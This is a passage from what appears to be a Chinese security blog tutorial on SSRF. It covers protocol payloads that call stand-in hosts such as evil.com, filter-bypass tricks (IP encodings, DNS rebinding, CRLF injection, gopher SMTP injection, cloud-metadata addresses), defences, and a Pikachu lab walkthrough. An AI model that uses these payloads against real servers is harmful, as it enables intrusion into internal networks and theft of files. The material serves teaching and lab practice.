<p>在这里，Sftp代表SSH文件传输协议（SSH File Transfer Protocol），或安全文件传输协议（Secure File Transfer Protocol），这是一种与SSH打包在一起的单独协议，它运行在安全连接上，并以类似的方式进行工作。</p>
<pre><code>http://example.com/ssrf.php?url=sftp://evil.com:1337/
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*]
accepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2
</code></pre>
<h3 id="5-4-ldap-或ldaps-或ldapi"><a href="#5-4-ldap-或ldaps-或ldapi" class="headerlink" title="5-4-ldap-或ldaps-或ldapi"></a>5.4 ldap://或ldaps:// 或ldapi://</h3>
<p>LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。</p>
<pre><code>http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquithttp://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit
</code></pre>
<h3 id="5-5-tftp"><a href="#5-5-tftp" class="headerlink" title="5-5-tftp"></a>5.5 tftp://</h3>
<p>TFTP（Trivial File Transfer Protocol,简单文件传输协议）是一种简单的基于lockstep机制的文件传输协议，它允许客户端从远程主机获取文件或将文件上传至远程主机。</p>
<pre><code>http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET
evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port1337)TESTUDPPACKEToctettsize0blksize512timeout3
</code></pre>
<h3 id="5-6-gopher"><a href="#5-6-gopher" class="headerlink" title="5-6-gopher"></a>5.6 gopher://</h3>
<p>Gopher是一种分布式文档传递服务。利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。</p>
<p><code>Gopher</code> 协议可以做很多事情，特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 <code>FTP、Telnet、Redis、Memcache</code>，也可以进行 <code>GET、POST</code> 请求。</p>
<pre><code>http://example.com/ssrf.php?url=http://attacker.com/gopher.php gopher.php (host it on acttacker.com):-&lt;?php header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');?&gt;
evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port1337)Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 49398)Hissrftest
</code></pre>
<h2 id="六、SSRF漏洞利用（危害）"><a href="#六、SSRF漏洞利用（危害）" class="headerlink" title="六、SSRF漏洞利用（危害）"></a>六、SSRF漏洞利用（危害）</h2>
<p>1.可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息;</p>
<p>2.攻击运行在内网或本地的应用程序（比如溢出）;</p>
<p>3.对内网web应用进行指纹识别，通过访问默认文件实现;</p>
<p>4.攻击内外网的web应用，主要是使用get参数就可以实现的攻击（比如struts2，sqli等）;</p>
<p>5.利用file协议读取本地文件等。.</p>
<p>6.各个协议调用探针：http,file,dict,ftp,gopher等</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http:192.168.64.144/phpmyadmin/<br>file:///D:/www.txt<br>dict://192.168.64.144:3306/info<br>ftp://192.168.64.144:21<br></code></pre></td></tr></table></figure>
<h2 id="七、漏洞的验证："><a href="#七、漏洞的验证：" class="headerlink" title="七、漏洞的验证："></a>七、漏洞的验证：</h2>
<pre><code>根据漏洞产生的原理，对所我们所测试的地方进行一个分析

首先这个地方应该是服务器A请求访问以外的服务端B，而不是客户端向服务器A发起请求

使用排除法：看URL地址中有没有包含其他URL地址，再看数据包的请求
</code></pre>
<p><strong>方法一：对URL地址进行分析</strong></p>
<p>我在网上随便找了一张图片，右键新标签打开后</p>
<p>对URL地址进行了解码，就看见了2个包含的URL地址</p>
<p class='item-img' data-src='image-20230410195257132.png'><img src="image-20230410195257132.png" alt="image-20230410195257132"></p>
<p><strong>方法二：对数据包进行分析</strong></p>
<p>其实也可以使用burpsuite抓包进行分析</p>
<p>这里直接看见了文件的URL是其他网站来的</p>
<p class='item-img' data-src='image-20230410195336547.png'><img src="image-20230410195336547.png" alt="image-20230410195336547"></p>
<h2 id="八、利用步骤"><a href="#八、利用步骤" class="headerlink" title="八、利用步骤"></a>八、利用步骤</h2>
<p><strong>第一步：分析是否可能存在SSRF</strong></p>
<p>（一般要测试3个函数curl_exec、file_get_content、fsockopen是否能执行成功）</p>
<p><strong>第二步：测试是哪种函数引起的SSRF漏洞</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">对端口进行一个探测（http协议），能够探测到内容，说明存在SSRF漏洞，并且进一步尝试其他操作<br><br>内网应用指纹识别（http协议）<br><br>读取文件（file协议）<br></code></pre></td></tr></table></figure>
<p>具体参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_53079406/article/details/124005258?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168112506716800215018171%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=168112506716800215018171&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-4-124005258-null-null.142">https://blog.csdn.net/qq_53079406/article/details/124005258?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168112506716800215018171%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=168112506716800215018171&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-4-124005258-null-null.142</a></p>
<h2 id="九、绕过方式"><a href="#九、绕过方式" class="headerlink" title="九、绕过方式"></a>九、绕过方式</h2>
<p><strong>部分存在漏洞，或者可能产生SSRF的功能中做了白名单或者黑名单的处理，来达到阻止对内网服务和资源的攻击和访问。因此想要达到SSRF的攻击，需要对请求的参数地址做相关的绕过处理，常见的绕过方式如下：</strong></p>
<p>一、常见的绕过方式</p>
<p>1、限制为<a target="_blank" rel="noopener" href="http://www.xxx.com">http://www.xxx.com</a> 域名时（利用@与/#/）</p>
<pre><code>可以尝试采用http基本身份认证的方式绕过
如：http://www.aaa.com@www.bbb.com@www.ccc.com，在对@解析域名中，不同的处理函数存在处理差异
在PHP的parse_url中会识别www.ccc.com，而libcurl则识别为www.bbb.com。

/#/符:绕过后缀
一般用于.jpg等固定后缀不可更改
例如http://10.10.10.10:5001/#/abc.jpg，实际在浏览器访问的是 http://10.10.10.10:5001
</code></pre>
<p>2.采用短网址绕过</p>
<pre><code>比如百度短地址https://dwz.cn/
</code></pre>
<p>3.采用进制转换</p>
<pre><code>127.0.0.1八进制：0177.0.0.1。十六进制：0x7f.0.0.1。十进制：2130706433.

IP地址转为八、十、十六进制及IP地址省略写法（以下均代表127.0.0.1）

   0177.00.00.01
   2130706433
   0x7f.0x0.0x0.0x1
   127.1
</code></pre>
<p class='item-img' data-src='image-20230410200106621.png'><img src="image-20230410200106621.png" alt="image-20230410200106621"></p>
<p>4.利用特殊域名</p>
<pre><code>原理是DNS解析。xip.io可以指向任意域名，即
127.0.0.1.xip.io，可解析为127.0.0.1
(xip.io 现在好像用不了了，可以找找其他的)

http://www.owasp.org.127.0.0.1.xip.io/
</code></pre>
<p>5.利用[::]绕过localhost</p>
<pre><code>可以利用[::]来绕过localhost
http://169.254.169.254&gt;&gt;http://[::169.254.169.254]
http://[::1]
http://[::]:80/
http://0:80
</code></pre>
<p>6.利用句号</p>
<pre><code>127。0。0。1 &gt;&gt;&gt; 127.0.0.1
</code></pre>
<p>7.CRLF 编码绕过</p>
<pre><code>%0d-&gt;0x0d-&gt;\r回车

%0a-&gt;0x0a-&gt;\n换行

进行HTTP头部注入
example.com/?url=http://eval.com%0d%0aHOST:fuzz.com%0d%0a 
</code></pre>
<p>8.利用封闭的字母数字</p>
<pre><code>利用Enclosed alphanumerics
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ &gt;&gt;&gt; example.com
http://169.254.169.254&gt;&gt;&gt;http://[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
</code></pre>
<p>9.配置域名</p>
<p>手上有可控域名，可将域名指向想要请求的IP</p>
<p>10.库绕过</p>
<p>利用检测时使用的URL parse库与请求时使用的parse库的差异绕过，如 <a target="_blank" rel="noopener" href="http://1.1.1.1">http://1.1.1.1</a> <a href="mailto:&amp;@2.2.2.2">&amp;@2.2.2.2</a># @3.3.3.3/ 不同的parse库的解析结果不一样</p>
<pre><code>urllib2 : 1.1.1.1

requests + browsers : 2.2.2.2

urllib : 3.3.3.3
</code></pre>
<p>11.dns重定向绕过</p>
<p>一般进行 ssrf 防御的模式如下：</p>
<p class='item-img' data-src='image-20230619155205417.png'><img src="image-20230619155205417.png" alt="image-20230619155205417"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. 获取到输入的URL，从该URL中提取host<br><br>   对该host进行DNS解析，获取到解析的IP<br><br>2. 访问规则判断该IP是否在指定范围内（即判断IP是否符合规则）<br><br>   如果IP在范围内，即对此URL发起请求<br><br>   如果IP不在范围内，则请求失败<br></code></pre></td></tr></table></figure>
<p>然而访问规则在判段得到的IP为指定范围内IP，到服务端请求URL这个中间还存在一个细微的时间差，</p>
<p>DNS重绑定则是利用这一点，让服务器第一次解析host的ip为符合规则的公网IP，在第二次请求解析URL时host的ip又变为了不符合规则的内网IP，从而进行ssrf。</p>
<p>这里推荐使用burpsuite的intruder模块，来批量发送请求，以利用时间差完成ssrf。</p>
<p class='item-img' data-src='image-20230619155251364.png'><img src="image-20230619155251364.png" alt="image-20230619155251364"></p>
<p>在线DNS重绑定平台：<a target="_blank" rel="noopener" href="https://lock.cmpxchg8b.com/rebinder.html">https://lock.cmpxchg8b.com/rebinder.html</a></p>
<p>12.攻击本地</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://127.0.0.1:80<br>http://localhost:22<br></code></pre></td></tr></table></figure>
<p>13.利用上传</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">也不一定是上传，我也说不清，自己体会 -.-<br>修改&quot;type=file&quot;为&quot;type=url&quot;<br>比如：<br>上传图片处修改上传，将图片文件修改为URL，即可能触发SSRF<br></code></pre></td></tr></table></figure>
<p>14.利用协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Dict://<br>dict://&lt;user-auth&gt;@&lt;host&gt;:&lt;port&gt;/d:&lt;word&gt;<br>ssrf.php?url=dict://attacker:11111/<br><br>SFTP://<br>ssrf.php?url=sftp://example.com:11111/<br><br>TFTP://<br>ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET<br><br>LDAP://<br>ssrf.php?url=ldap://localhost:11211/%0astats%0aquit<br><br>Gopher://<br>ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a<br></code></pre></td></tr></table></figure>
<p>15.302重定向</p>
<p>需要一个vps，把302转换的代码部署到vps上，然后去访问，就可跳转到内网中</p>
<p>服务端代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php <br>header(&quot;Location: http://192.168.1.10&quot;);<br>exit(); <br>?&gt;<br></code></pre></td></tr></table></figure>
<p>16.使用组合</p>
<p><strong>各种绕过进行自由组合即可</strong></p>
<h2 id="十、SSRF漏防御"><a href="#十、SSRF漏防御" class="headerlink" title="十、SSRF漏防御"></a>十、SSRF漏防御</h2>
<p>通常有以下5个思路：</p>
<p>1.过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。</p>
<p>2.统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态。</p>
<p>3.限制请求的端口为http常用的端口，比如，80,443,8080,8090。</p>
<p>4.黑名单内网，避免应用被用来获取获取内网数据，攻击内网。</p>
<p>5.禁用不需要的协议。仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。</p>
<p>6.去除url中的特殊字符</p>
<p>7.不跟随30x跳转（跟随跳转需要从1开始重新检测）</p>
<p>8.请求时设置host header为ip</p>
<h2 id="十一、靶场实战"><a href="#十一、靶场实战" class="headerlink" title="十一、靶场实战"></a>十一、靶场实战</h2>
<h3 id="1-SSRF-curl"><a href="#1-SSRF-curl" class="headerlink" title="1-SSRF-curl"></a>1. SSRF-curl</h3>
<p><strong>第一步：分析是否可能存在SSRF</strong></p>
<p>（一般要测试3个函数curl_exec、file_get_content、fsockopen是否能执行成功）</p>
<p>点击它</p>
<p class='item-img' data-src='image-20230619160839314.png'><img src="image-20230619160839314.png" alt="image-20230619160839314"></p>
<p>发现是URL传递的</p>
<p>（如果无法显示，就在127.0.0.1后面加上端口号）</p>
<p class='item-img' data-src='image-20230619160911885.png'><img src="image-20230619160911885.png" alt="image-20230619160911885"></p>
<p><strong>第二步：测试是哪种函数引起的SSRF漏洞</strong></p>
<p>这是个SSRF（curl）靶场，就不做过多测试</p>
<p>函数不同所支持的功能也存在差别</p>
<p>对端口进行一个探测（http协议）(当然实战过程中肯定要对端口进行爆破，响应时间长的端口就是可以访问的端口)</p>
<p><code>http://localhost:8080/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306</code></p>
<p class='item-img' data-src='image-20230619161101784.png'><img src="image-20230619161101784.png" alt="image-20230619161101784"></p>
<p>能够探测到内容，说明存在SSRF漏洞，并且进一步尝试其他操作</p>
<p><strong>内网应用指纹识别（http协议）</strong></p>
<p>（这个我在尝试的时候，如果原文件带了版本号，读取的时候也要带，大小写不一样不影响）</p>
<p class='item-img' data-src='image-20230619161335778.png'><img src="image-20230619161335778.png" alt="image-20230619161335778"></p>
<p><strong>读取文件（file协议）</strong></p>
<p class='item-img' data-src='image-20230619161625267.png'><img src="image-20230619161625267.png" alt="image-20230619161625267"></p>
<h3 id="2-SSRF-file-get-contents"><a href="#2-SSRF-file-get-contents" class="headerlink" title="2-SSRF-file-get-contents"></a>2. SSRF-file_get_contents</h3>
<p><strong>第一步：判断是否存在SSRF漏洞</strong></p>
<p>上一题是url，这一题是file函数</p>
<p><strong>但是操作还是基本类似</strong></p>
<p class='item-img' data-src='image-20230619161758882.png'><img src="image-20230619161758882.png" alt="image-20230619161758882"></p>
<p>8.2.2、第二步：利用漏洞</p>
<p>读取php源码</p>
<p><code>http://localhost:8080/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php</code><br class='item-img' data-src='image-20230619161930086.png'><img src="image-20230619161930086.png" alt="image-20230619161930086"></p>
<p>再使用base64解密即可得到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Created by runner.han</span><br><span class="hljs-comment"> * There is nothing new under the sun</span><br><span class="hljs-comment"> */</span><br><br><br><span class="hljs-variable">$SELF_PAGE</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;PHP_SELF&#x27;</span>],<span class="hljs-title function_ invoke__">strrpos</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;PHP_SELF&#x27;</span>],<span class="hljs-string">&#x27;/&#x27;</span>)+<span class="hljs-number">1</span>);<br><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$SELF_PAGE</span> = <span class="hljs-string">&quot;ssrf.php&quot;</span>)&#123;<br>    <span class="hljs-variable">$ACTIVE</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;active open&#x27;</span>,<span class="hljs-string">&#x27;active&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>);<br>&#125;<br><br><span class="hljs-variable">$PIKA_ROOT_DIR</span> =  <span class="hljs-string">&quot;../../&quot;</span>;<br><span class="hljs-keyword">include_once</span> <span class="hljs-variable">$PIKA_ROOT_DIR</span>.<span class="hljs-string">&#x27;header.php&#x27;</span>;<br><br><br><br><br><br><br><span class="hljs-meta">?&gt;</span><br><br><br>&lt;div <span class="hljs-class"><span class="hljs-keyword">class</span>=&quot;<span class="hljs-title">main</span>-<span class="hljs-title">content</span>&quot;&gt;</span><br><span class="hljs-class">    &lt;<span class="hljs-title">div</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">main</span>-<span class="hljs-title">content</span>-<span class="hljs-title">inner</span>&quot;&gt;</span><br><span class="hljs-class">        &lt;<span class="hljs-title">div</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">breadcrumbs</span> <span class="hljs-title">ace</span>-<span class="hljs-title">save</span>-<span class="hljs-title">state</span>&quot; <span class="hljs-title">id</span>=&quot;<span class="hljs-title">breadcrumbs</span>&quot;&gt;</span><br><span class="hljs-class">            &lt;<span class="hljs-title">ul</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">breadcrumb</span>&quot;&gt;</span><br><span class="hljs-class">                &lt;<span class="hljs-title">li</span>&gt;</span><br><span class="hljs-class">                    &lt;<span class="hljs-title">i</span> <span class="hljs-title">class</span>=&quot;<span class="hljs-title">ace</span>-<span class="hljs-title">icon</span> <span 